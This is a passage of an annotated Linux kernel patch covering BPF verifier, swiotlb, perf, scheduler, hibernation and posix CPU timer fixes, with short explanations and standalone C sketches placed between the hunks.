+ 			regs[BPF_REG_0].id = ++env->id_gen;
+-	} /* else { add_kfunc_call() ensures it is btf_type_is_void(t) } */
++	} else if (btf_type_is_void(t)) {
++		if (meta.btf == btf_vmlinux && btf_id_set_contains(&special_kfunc_set, meta.func_id)) {
++			if (meta.func_id == special_kfunc_list[KF_bpf_obj_drop_impl]) {
++				insn_aux->kptr_struct_meta =
++					btf_find_struct_meta(meta.arg_obj_drop.btf,
++							     meta.arg_obj_drop.btf_id);
++			}
++		}
++	}
+ 
+-	nargs = btf_type_vlen(func_proto);
+-	args = (const struct btf_param *)(func_proto + 1);
++	nargs = btf_type_vlen(meta.func_proto);
++	args = (const struct btf_param *)(meta.func_proto + 1);
+ 	for (i = 0; i < nargs; i++) {
+ 		u32 regno = i + 1;
+ 
+@@ -11711,8 +12109,10 @@ static void mark_ptr_or_null_reg(struct bpf_func_state *state,
+ 		 */
+ 		if (WARN_ON_ONCE(reg->smin_value || reg->smax_value || !tnum_equals_const(reg->var_off, 0)))
+ 			return;
+-		if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC | PTR_MAYBE_NULL) && WARN_ON_ONCE(reg->off))
++		if (!(type_is_ptr_alloc_obj(reg->type) || type_is_non_owning_ref(reg->type)) &&
++		    WARN_ON_ONCE(reg->off))
+ 			return;
++
+ 		if (is_null) {
+ 			reg->type = SCALAR_VALUE;
+ 			/* We don't need id and ref_obj_id from this point
+@@ -13674,10 +14074,11 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 		state_reg = state->regs;
+ 		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+-				verbose(env, "frame %d: propagating r%d\n", i, fr);
++				verbose(env, "frame %d: propagating r%d\n", fr, i);
+ 			err = mark_chain_precision_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -13688,11 +14089,12 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 				continue;
+ 			state_reg = &state->stack[i].spilled_ptr;
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+ 				verbose(env, "frame %d: propagating fp%d\n",
+-					(-i - 1) * BPF_REG_SIZE, fr);
++					fr, (-i - 1) * BPF_REG_SIZE);
+ 			err = mark_chain_precision_stack_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -14216,7 +14618,7 @@ static int do_check(struct bpf_verifier_env *env)
+ 					if ((insn->src_reg == BPF_REG_0 && insn->imm != BPF_FUNC_spin_unlock) ||
+ 					    (insn->src_reg == BPF_PSEUDO_CALL) ||
+ 					    (insn->src_reg == BPF_PSEUDO_KFUNC_CALL &&
+-					     (insn->off != 0 || !is_bpf_list_api_kfunc(insn->imm)))) {
++					     (insn->off != 0 || !is_bpf_graph_api_kfunc(insn->imm)))) {
+ 						verbose(env, "function calls are not allowed while holding a lock\n");
+ 						return -EINVAL;
+ 					}
+@@ -14252,7 +14654,8 @@ static int do_check(struct bpf_verifier_env *env)
+ 					return -EINVAL;
+ 				}
+ 
+-				if (env->cur_state->active_lock.ptr) {
++				if (env->cur_state->active_lock.ptr &&
++				    !in_rbtree_lock_required_cb(env)) {
+ 					verbose(env, "bpf_spin_unlock is missing\n");
+ 					return -EINVAL;
+ 				}
+@@ -14514,9 +14917,10 @@ static int check_map_prog_compatibility(struct bpf_verifier_env *env,
+ {
+ 	enum bpf_prog_type prog_type = resolve_prog_type(prog);
+ 
+-	if (btf_record_has_field(map->record, BPF_LIST_HEAD)) {
++	if (btf_record_has_field(map->record, BPF_LIST_HEAD) ||
++	    btf_record_has_field(map->record, BPF_RB_ROOT)) {
+ 		if (is_tracing_prog_type(prog_type)) {
+-			verbose(env, "tracing progs cannot use bpf_list_head yet\n");
++			verbose(env, "tracing progs cannot use bpf_{list_head,rb_root} yet\n");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -16115,21 +16519,21 @@ static int do_misc_fixups(struct bpf_verifier_env *env)
+ 			BUILD_BUG_ON(!__same_type(ops->map_lookup_elem,
+ 				     (void *(*)(struct bpf_map *map, void *key))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_delete_elem,
+-				     (int (*)(struct bpf_map *map, void *key))NULL));
++				     (long (*)(struct bpf_map *map, void *key))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_update_elem,
+-				     (int (*)(struct bpf_map *map, void *key, void *value,
++				     (long (*)(struct bpf_map *map, void *key, void *value,
+ 					      u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_push_elem,
+-				     (int (*)(struct bpf_map *map, void *value,
++				     (long (*)(struct bpf_map *map, void *value,
+ 					      u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_pop_elem,
+-				     (int (*)(struct bpf_map *map, void *value))NULL));
++				     (long (*)(struct bpf_map *map, void *value))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_peek_elem,
+-				     (int (*)(struct bpf_map *map, void *value))NULL));
++				     (long (*)(struct bpf_map *map, void *value))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_redirect,
+-				     (int (*)(struct bpf_map *map, u64 index, u64 flags))NULL));
++				     (long (*)(struct bpf_map *map, u64 index, u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_for_each_callback,
+-				     (int (*)(struct bpf_map *map,
++				     (long (*)(struct bpf_map *map,
+ 					      bpf_callback_t callback_fn,
+ 					      void *callback_ctx,
+ 					      u64 flags))NULL));
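
The BUILD_BUG_ON/__same_type block keeps the inline-patching fast path
honest: if any map-op signature drifts from the long-returning prototypes,
the kernel stops compiling. The same technique works in plain GNU C; a
standalone sketch (assumes GCC or Clang builtins):

    #include <stdio.h>

    #define __same_type(a, b) \
        __builtin_types_compatible_p(__typeof__(a), __typeof__(b))
    #define BUILD_BUG_ON(cond) ((void)sizeof(char[1 - 2 * !!(cond)]))

    struct map;

    static long delete_elem(struct map *m, void *key)
    {
        (void)m; (void)key;
        return 0;
    }

    int main(void)
    {
        /* compiles only if delete_elem has the expected 'long' signature */
        BUILD_BUG_ON(!__same_type(&delete_elem,
                                  (long (*)(struct map *, void *))0));
        puts("signature check passed at compile time");
        return 0;
    }
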
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index ef3bc3a5bbed3..81f40821084ec 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -935,7 +935,9 @@ EXPORT_SYMBOL_GPL(is_swiotlb_active);
+ 
+ static int io_tlb_used_get(void *data, u64 *val)
+ {
+-	*val = mem_used(&io_tlb_default_mem);
++	struct io_tlb_mem *mem = data;
++
++	*val = mem_used(mem);
+ 	return 0;
+ }
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_io_tlb_used, io_tlb_used_get, NULL, "%llu\n");
+@@ -948,7 +950,7 @@ static void swiotlb_create_debugfs_files(struct io_tlb_mem *mem,
+ 		return;
+ 
+ 	debugfs_create_ulong("io_tlb_nslabs", 0400, mem->debugfs, &mem->nslabs);
+-	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, NULL,
++	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, mem,
+ 			&fops_io_tlb_used);
+ }
+ 
+@@ -1003,6 +1005,11 @@ static int rmem_swiotlb_device_init(struct reserved_mem *rmem,
+ 	/* Set Per-device io tlb area to one */
+ 	unsigned int nareas = 1;
+ 
++	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
++		dev_err(dev, "Restricted DMA pool must be accessible within the linear mapping.");
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * Since multiple devices can share the same pool, the private data,
+ 	 * io_tlb_mem struct, will be initialized by the first device attached
+@@ -1064,11 +1071,6 @@ static int __init rmem_swiotlb_setup(struct reserved_mem *rmem)
+ 	    of_get_flat_dt_prop(node, "no-map", NULL))
+ 		return -EINVAL;
+ 
+-	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
+-		pr_err("Restricted DMA pool must be accessible within the linear mapping.");
+-		return -EINVAL;
+-	}
+-
+ 	rmem->ops = &rmem_swiotlb_ops;
+ 	pr_info("Reserved memory: created restricted DMA pool at %pa, size %ld MiB\n",
+ 		&rmem->base, (unsigned long)rmem->size / SZ_1M);
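
The swiotlb change above threads the io_tlb_mem instance through the debugfs
file's data pointer instead of hardcoding the default pool, so per-device
pools report their own usage. The underlying pattern — bind the instance at
registration time, recover it in the callback — in a standalone userspace
sketch (types and names are illustrative):

    #include <stdio.h>

    struct pool { unsigned long used; };

    /* the callback receives the instance it was registered with, not a global */
    typedef int (*get_fn)(void *data, unsigned long long *val);

    struct attr_file { void *data; get_fn get; };

    static int pool_used_get(void *data, unsigned long long *val)
    {
        struct pool *p = data;
        *val = p->used;
        return 0;
    }

    int main(void)
    {
        struct pool a = { 42 }, b = { 7 };
        struct attr_file fa = { &a, pool_used_get };
        struct attr_file fb = { &b, pool_used_get };
        unsigned long long v;

        fa.get(fa.data, &v); printf("pool a used=%llu\n", v);
        fb.get(fb.data, &v); printf("pool b used=%llu\n", v);
        return 0;
    }
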
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index daecb8c9126b0..2290d67ade41d 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -9408,8 +9408,8 @@ __perf_event_account_interrupt(struct perf_event *event, int throttle)
+ 		hwc->interrupts = 1;
+ 	} else {
+ 		hwc->interrupts++;
+-		if (unlikely(throttle
+-			     && hwc->interrupts >= max_samples_per_tick)) {
++		if (unlikely(throttle &&
++			     hwc->interrupts > max_samples_per_tick)) {
+ 			__this_cpu_inc(perf_throttled_count);
+ 			tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
+ 			hwc->interrupts = MAX_INTERRUPTS;
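
Switching the throttle comparison from >= to > lets a perf event deliver
exactly max_samples_per_tick samples before being throttled, instead of one
fewer. A simplified boundary count (this ignores the sticky MAX_INTERRUPTS
state the real code sets once throttled):

    #include <stdio.h>

    int main(void)
    {
        const unsigned max_samples_per_tick = 4;
        unsigned interrupts, delivered_ge = 0, delivered_gt = 0;

        for (interrupts = 1; interrupts <= 6; interrupts++)
            if (!(interrupts >= max_samples_per_tick))
                delivered_ge++;          /* old check: throttles at the 4th */

        for (interrupts = 1; interrupts <= 6; interrupts++)
            if (!(interrupts > max_samples_per_tick))
                delivered_gt++;          /* new check: allows all 4 */

        printf("old '>=': %u samples, new '>': %u samples\n",
               delivered_ge, delivered_gt);
        return 0;
    }
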
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 54d077e1a2dc7..5a60cc52adc0c 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -337,11 +337,20 @@ static void delay_access(int type)
+  */
+ static __always_inline u64 read_instrumented_memory(const volatile void *ptr, size_t size)
+ {
++	/*
++	 * In the below we don't necessarily need the read of the location to
++	 * be atomic, and we don't use READ_ONCE(), since all we need for race
++	 * detection is to observe 2 different values.
++	 *
++	 * Furthermore, on certain architectures (such as arm64), READ_ONCE()
++	 * may turn into more complex instructions than a plain load that cannot
++	 * do unaligned accesses.
++	 */
+ 	switch (size) {
+-	case 1:  return READ_ONCE(*(const u8 *)ptr);
+-	case 2:  return READ_ONCE(*(const u16 *)ptr);
+-	case 4:  return READ_ONCE(*(const u32 *)ptr);
+-	case 8:  return READ_ONCE(*(const u64 *)ptr);
++	case 1:  return *(const volatile u8 *)ptr;
++	case 2:  return *(const volatile u16 *)ptr;
++	case 4:  return *(const volatile u32 *)ptr;
++	case 8:  return *(const volatile u64 *)ptr;
+ 	default: return 0; /* Ignore; we do not diff the values. */
+ 	}
+ }
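
The kcsan hunk replaces READ_ONCE() with plain volatile loads: race
detection only needs to observe two differing values, and on arm64
READ_ONCE() can expand to instructions that fault on unaligned addresses.
A userspace rendering of the patched helper:

    #include <stddef.h>
    #include <stdio.h>
    #include <stdint.h>

    /* a plain (volatile) load suffices; the two reads are only diffed */
    static uint64_t read_instrumented_memory(const volatile void *ptr,
                                             size_t size)
    {
        switch (size) {
        case 1:  return *(const volatile uint8_t *)ptr;
        case 2:  return *(const volatile uint16_t *)ptr;
        case 4:  return *(const volatile uint32_t *)ptr;
        case 8:  return *(const volatile uint64_t *)ptr;
        default: return 0; /* ignore; values are only compared */
        }
    }

    int main(void)
    {
        uint32_t x = 0xdeadbeef;

        printf("%#llx\n",
               (unsigned long long)read_instrumented_memory(&x, sizeof(x)));
        return 0;
    }
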
+diff --git a/kernel/kheaders.c b/kernel/kheaders.c
+index 8f69772af77b4..42163c9e94e55 100644
+--- a/kernel/kheaders.c
++++ b/kernel/kheaders.c
+@@ -26,15 +26,15 @@ asm (
+ "	.popsection				\n"
+ );
+ 
+-extern char kernel_headers_data;
+-extern char kernel_headers_data_end;
++extern char kernel_headers_data[];
++extern char kernel_headers_data_end[];
+ 
+ static ssize_t
+ ikheaders_read(struct file *file,  struct kobject *kobj,
+ 	       struct bin_attribute *bin_attr,
+ 	       char *buf, loff_t off, size_t len)
+ {
+-	memcpy(buf, &kernel_headers_data + off, len);
++	memcpy(buf, &kernel_headers_data[off], len);
+ 	return len;
+ }
+ 
+@@ -48,8 +48,8 @@ static struct bin_attribute kheaders_attr __ro_after_init = {
+ 
+ static int __init ikheaders_init(void)
+ {
+-	kheaders_attr.size = (&kernel_headers_data_end -
+-			      &kernel_headers_data);
++	kheaders_attr.size = (kernel_headers_data_end -
++			      kernel_headers_data);
+ 	return sysfs_create_bin_file(kernel_kobj, &kheaders_attr);
+ }
+ 
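
Declaring the section-bracketing symbols as arrays (kernel_headers_data[])
rather than single chars makes the pointer arithmetic on them well-formed C
instead of arithmetic on the addresses of two unrelated one-byte objects.
The same label-bracketing technique in a standalone program (assumes a GNU
toolchain on an ELF target):

    __asm__(
    "    .pushsection .rodata, \"a\"\n"
    "    .globl blob_start\n"
    "blob_start:\n"
    "    .ascii \"hello\"\n"
    "    .globl blob_end\n"
    "blob_end:\n"
    "    .popsection\n"
    );

    extern char blob_start[];   /* arrays, not single chars: pointer   */
    extern char blob_end[];     /* arithmetic on them is well-formed   */

    #include <stdio.h>

    int main(void)
    {
        printf("blob size: %td bytes\n", blob_end - blob_start);
        return 0;
    }
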
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index bb79ac1a6d8f7..7ddc87bee2741 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
+@@ -267,7 +267,7 @@ static ssize_t module_zstd_decompress(struct load_info *info,
+ 		zstd_dec.size = PAGE_SIZE;
+ 
+ 		ret = zstd_decompress_stream(dstream, &zstd_dec, &zstd_buf);
+-		kunmap(page);
++		kunmap_local(zstd_dec.dst);
+ 		retval = zstd_get_error_code(ret);
+ 		if (retval)
+ 			break;
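
The decompress fix pairs the unmap with the mapping actually taken: a
kmap_local_page() mapping must be undone by address with kunmap_local(),
not by page with kunmap(). A short kernel-context sketch of the pairing
rule (identifiers like page and src are assumed in scope; this is not a
standalone program):

    void *dst = kmap_local_page(page);   /* map: returns a kernel address */
    memcpy(dst, src, PAGE_SIZE);         /* ... use the mapping ...       */
    kunmap_local(dst);                   /* unmap by address, not by page */
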
+diff --git a/kernel/power/hibernate.c b/kernel/power/hibernate.c
+index 793c55a2becba..30d1274f03f62 100644
+--- a/kernel/power/hibernate.c
++++ b/kernel/power/hibernate.c
+@@ -64,6 +64,7 @@ enum {
+ static int hibernation_mode = HIBERNATION_SHUTDOWN;
+ 
+ bool freezer_test_done;
++bool snapshot_test;
+ 
+ static const struct platform_hibernation_ops *hibernation_ops;
+ 
+@@ -687,18 +688,22 @@ static int load_image_and_restore(void)
+ {
+ 	int error;
+ 	unsigned int flags;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	pm_pr_dbg("Loading hibernation image.\n");
+ 
+ 	lock_device_hotplug();
+ 	error = create_basic_memory_bitmaps();
+ 	if (error) {
+-		swsusp_close(FMODE_READ | FMODE_EXCL);
++		swsusp_close(mode);
+ 		goto Unlock;
+ 	}
+ 
+ 	error = swsusp_read(&flags);
+-	swsusp_close(FMODE_READ | FMODE_EXCL);
++	swsusp_close(mode);
+ 	if (!error)
+ 		error = hibernation_restore(flags & SF_PLATFORM_MODE);
+ 
+@@ -716,7 +721,6 @@ static int load_image_and_restore(void)
+  */
+ int hibernate(void)
+ {
+-	bool snapshot_test = false;
+ 	unsigned int sleep_flags;
+ 	int error;
+ 
+@@ -744,6 +748,9 @@ int hibernate(void)
+ 	if (error)
+ 		goto Exit;
+ 
++	/* protected by system_transition_mutex */
++	snapshot_test = false;
++
+ 	lock_device_hotplug();
+ 	/* Allocate memory management structures */
+ 	error = create_basic_memory_bitmaps();
+@@ -940,6 +947,8 @@ static int software_resume(void)
+ 	 */
+ 	mutex_lock_nested(&system_transition_mutex, SINGLE_DEPTH_NESTING);
+ 
++	snapshot_test = false;
++
+ 	if (swsusp_resume_device)
+ 		goto Check_image;
+ 
+diff --git a/kernel/power/power.h b/kernel/power/power.h
+index b4f4339432096..b83c8d5e188de 100644
+--- a/kernel/power/power.h
++++ b/kernel/power/power.h
+@@ -59,6 +59,7 @@ asmlinkage int swsusp_save(void);
+ 
+ /* kernel/power/hibernate.c */
+ extern bool freezer_test_done;
++extern bool snapshot_test;
+ 
+ extern int hibernation_snapshot(int platform_mode);
+ extern int hibernation_restore(int platform_mode);
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index 277434b6c0bfd..cc44c37699de6 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -1518,9 +1518,13 @@ int swsusp_check(void)
+ {
+ 	int error;
+ 	void *holder;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	hib_resume_bdev = blkdev_get_by_dev(swsusp_resume_device,
+-					    FMODE_READ | FMODE_EXCL, &holder);
++					    mode, &holder);
+ 	if (!IS_ERR(hib_resume_bdev)) {
+ 		set_blocksize(hib_resume_bdev, PAGE_SIZE);
+ 		clear_page(swsusp_header);
+@@ -1547,7 +1551,7 @@ int swsusp_check(void)
+ 
+ put:
+ 		if (error)
+-			blkdev_put(hib_resume_bdev, FMODE_READ | FMODE_EXCL);
++			blkdev_put(hib_resume_bdev, mode);
+ 		else
+ 			pr_debug("Image signature found, resuming\n");
+ 	} else {
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 5221291937713..20f5492e6a07b 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -659,6 +659,7 @@ void __rcu_irq_enter_check_tick(void)
+ 	}
+ 	raw_spin_unlock_rcu_node(rdp->mynode);
+ }
++NOKPROBE_SYMBOL(__rcu_irq_enter_check_tick);
+ #endif /* CONFIG_NO_HZ_FULL */
+ 
+ /*
+diff --git a/kernel/relay.c b/kernel/relay.c
+index ef12532168d9c..e16efd55571ca 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -989,7 +989,8 @@ static size_t relay_file_read_start_pos(struct rchan_buf *buf)
+ 	size_t subbuf_size = buf->chan->subbuf_size;
+ 	size_t n_subbufs = buf->chan->n_subbufs;
+ 	size_t consumed = buf->subbufs_consumed % n_subbufs;
+-	size_t read_pos = consumed * subbuf_size + buf->bytes_consumed;
++	size_t read_pos = (consumed * subbuf_size + buf->bytes_consumed)
++			% (n_subbufs * subbuf_size);
+ 
+ 	read_subbuf = read_pos / subbuf_size;
+ 	padding = buf->padding[read_subbuf];
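
relay_file_read_start_pos() could previously compute a read position one
full sub-buffer past the end when the reader had fully consumed the last
sub-buffer; the added modulo wraps it back into the buffer. With concrete
numbers:

    #include <stdio.h>

    int main(void)
    {
        size_t subbuf_size = 4096, n_subbufs = 4;
        size_t consumed = 3;            /* reader sits in the last sub-buffer */
        size_t bytes_consumed = 4096;   /* ...and has drained all of it       */

        size_t old_pos = consumed * subbuf_size + bytes_consumed;
        size_t new_pos = old_pos % (n_subbufs * subbuf_size);

        printf("old read_pos=%zu (buffer is only %zu bytes)\n",
               old_pos, n_subbufs * subbuf_size);
        printf("new read_pos=%zu (wrapped to the start)\n", new_pos);
        return 0;
    }
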
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 0d97d54276cc8..238bdb36f8848 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2246,6 +2246,7 @@ static struct rq *find_lock_later_rq(struct task_struct *task, struct rq *rq)
+ 				     !cpumask_test_cpu(later_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !dl_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 				double_unlock_balance(rq, later_rq);
+ 				later_rq = NULL;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 661226e38835d..6f1c7a8fa12ab 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6487,7 +6487,7 @@ static int wake_affine(struct sched_domain *sd, struct task_struct *p,
+ 		target = wake_affine_weight(sd, p, this_cpu, prev_cpu, sync);
+ 
+ 	schedstat_inc(p->stats.nr_wakeups_affine_attempts);
+-	if (target == nr_cpumask_bits)
++	if (target != this_cpu)
+ 		return prev_cpu;
+ 
+ 	schedstat_inc(sd->ttwu_move_affine);
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 0a11f44adee57..4f5796dd26a56 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2000,11 +2000,15 @@ static struct rq *find_lock_lowest_rq(struct task_struct *task, struct rq *rq)
+ 			 * the mean time, task could have
+ 			 * migrated already or had its affinity changed.
+ 			 * Also make sure that it wasn't scheduled on its rq.
++			 * It is possible the task was scheduled, set
++			 * "migrate_disabled" and then got preempted, so we must
++			 * check the task migration disable flag here too.
+ 			 */
+ 			if (unlikely(task_rq(task) != rq ||
+ 				     !cpumask_test_cpu(lowest_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !rt_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 
+ 				double_unlock_balance(rq, lowest_rq);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8b..44b25ff35d28a 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -847,6 +847,8 @@ static u64 collect_timerqueue(struct timerqueue_head *head,
+ 			return expires;
+ 
+ 		ctmr->firing = 1;
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(ctmr->handling, current);
+ 		cpu_timer_dequeue(ctmr);
+ 		list_add_tail(&ctmr->elist, firing);
+ 	}
+@@ -1162,7 +1164,49 @@ static void handle_posix_cpu_timers(struct task_struct *tsk);
+ #ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
+ static void posix_cpu_timers_work(struct callback_head *work)
+ {
++	struct posix_cputimers_work *cw = container_of(work, typeof(*cw), work);
++
++	mutex_lock(&cw->mutex);
+ 	handle_posix_cpu_timers(current);
++	mutex_unlock(&cw->mutex);
++}
++
++/*
++ * Invoked from the posix-timer core when a cancel operation fails because
++ * the timer is marked firing. The caller holds rcu_read_lock(), which
++ * protects the timer and the task which is expiring it from being freed.
++ */
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	struct task_struct *tsk = rcu_dereference(timr->it.cpu.handling);
++
++	/* Has the handling task completed expiry already? */
++	if (!tsk)
++		return;
++
++	/* Ensure that the task cannot go away */
++	get_task_struct(tsk);
++	/* Now drop the RCU protection so the mutex can be locked */
++	rcu_read_unlock();
++	/* Wait on the expiry mutex */
++	mutex_lock(&tsk->posix_cputimers_work.mutex);
++	/* Release it immediately again. */
++	mutex_unlock(&tsk->posix_cputimers_work.mutex);
++	/* Drop the task reference. */
++	put_task_struct(tsk);
++	/* Relock RCU so the callsite is balanced */
++	rcu_read_lock();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	/* Ensure that timr->it.cpu.handling task cannot go away */
++	rcu_read_lock();
++	spin_unlock_irq(&timr->it_lock);
++	posix_cpu_timer_wait_running(timr);
++	rcu_read_unlock();
++	/* @timr is on stack and is valid */
++	spin_lock_irq(&timr->it_lock);
+ }
+ 
+ /*
+@@ -1178,6 +1222,7 @@ void clear_posix_cputimers_work(struct task_struct *p)
+ 	       sizeof(p->posix_cputimers_work.work));
+ 	init_task_work(&p->posix_cputimers_work.work,
+ 		       posix_cpu_timers_work);
++	mutex_init(&p->posix_cputimers_work.mutex);
+ 	p->posix_cputimers_work.scheduled = false;
+ }
+ 
+@@ -1256,6 +1301,18 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk)
+ 	lockdep_posixtimer_exit();
+ }
+ 
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	cpu_relax();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	spin_unlock_irq(&timr->it_lock);
++	cpu_relax();
++	spin_lock_irq(&timr->it_lock);
++}
++
+ static inline bool posix_cpu_timers_work_scheduled(struct task_struct *tsk)
+ {
+ 	return false;
+@@ -1364,6 +1421,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
+ 		 */
+ 		if (likely(cpu_firing >= 0))
+ 			cpu_timer_fire(timer);
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(timer->it.cpu.handling, NULL);
+ 		spin_unlock(&timer->it_lock);
+ 	}
+ }
+@@ -1498,23 +1557,16 @@ static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
+ 		expires = cpu_timer_getexpires(&timer.it.cpu);
+ 		error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
+ 		if (!error) {
+-			/*
+-			 * Timer is now unarmed, deletion can not fail.
+-			 */
++			/* Timer is now unarmed, deletion can not fail. */
+ 			posix_cpu_timer_del(&timer);
++		} else {
++			while (error == TIMER_RETRY) {
++				posix_cpu_timer_wait_running_nsleep(&timer);
++				error = posix_cpu_timer_del(&timer);
++			}
+ 		}
+-		spin_unlock_irq(&timer.it_lock);
+ 
+-		while (error == TIMER_RETRY) {
+-			/*
+-			 * We need to handle case when timer was or is in the
+-			 * middle of firing. In other cases we already freed
+-			 * resources.
+-			 */
+-			spin_lock_irq(&timer.it_lock);
+-			error = posix_cpu_timer_del(&timer);
+-			spin_unlock_irq(&timer.it_lock);
+-		}
++		spin_unlock_irq(&timer.it_lock);
+ 
+ 		if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
+ 			/*
+@@ -1624,6 +1676,7 @@ const struct k_clock clock_posix_cpu = {
+ 	.timer_del		= posix_cpu_timer_del,
+ 	.timer_get		= posix_cpu_timer_get,
+ 	.timer_rearm		= posix_cpu_timer_rearm,
++	.timer_wait_running	= posix_cpu_timer_wait_running,
+ };
+ 
+ const struct k_clock clock_process = {
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 0c8a87a11b39d..808a247205a9a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -846,6 +846,10 @@ static struct k_itimer *timer_wait_running(struct k_itimer *timer,
+ 	rcu_read_lock();
+ 	unlock_timer(timer, *flags);
+ 
++	/*
++	 * kc->timer_wait_running() might drop RCU lock. So @timer
++	 * cannot be touched anymore after the function returns!
++	 */
+ 	if (!WARN_ON_ONCE(!kc->timer_wait_running))
+ 		kc->timer_wait_running(timer);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 46789356f856e..65b8658da829e 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,9 +218,19 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
++			ktime_t next_p;
++			u32 rem;
++
+ 			tick_do_timer_cpu = cpu;
+ 
+-			tick_next_period = ktime_get();
++			next_p = ktime_get();
++			div_u64_rem(next_p, TICK_NSEC, &rem);
++			if (rem) {
++				next_p -= rem;
++				next_p += TICK_NSEC;
++			}
++
++			tick_next_period = next_p;
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index b0e3c9205946f..a46506f7ec6d0 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -281,6 +281,11 @@ static bool check_tick_dependency(atomic_t *dep)
+ 		return true;
+ 	}
+ 
++	if (val & TICK_DEP_MASK_RCU_EXP) {
++		trace_tick_stop(0, TICK_DEP_MASK_RCU_EXP);
++		return true;
++	}
++
+ 	return false;
+ }
+ 
+@@ -527,7 +532,7 @@ void __init tick_nohz_full_setup(cpumask_var_t cpumask)
+ 	tick_nohz_full_running = true;
+ }
+ 
+-static int tick_nohz_cpu_down(unsigned int cpu)
++bool tick_nohz_cpu_hotpluggable(unsigned int cpu)
+ {
+ 	/*
+ 	 * The tick_do_timer_cpu CPU handles housekeeping duty (unbound
+@@ -535,8 +540,13 @@ static int tick_nohz_cpu_down(unsigned int cpu)
+ 	 * CPUs. It must remain online when nohz full is enabled.
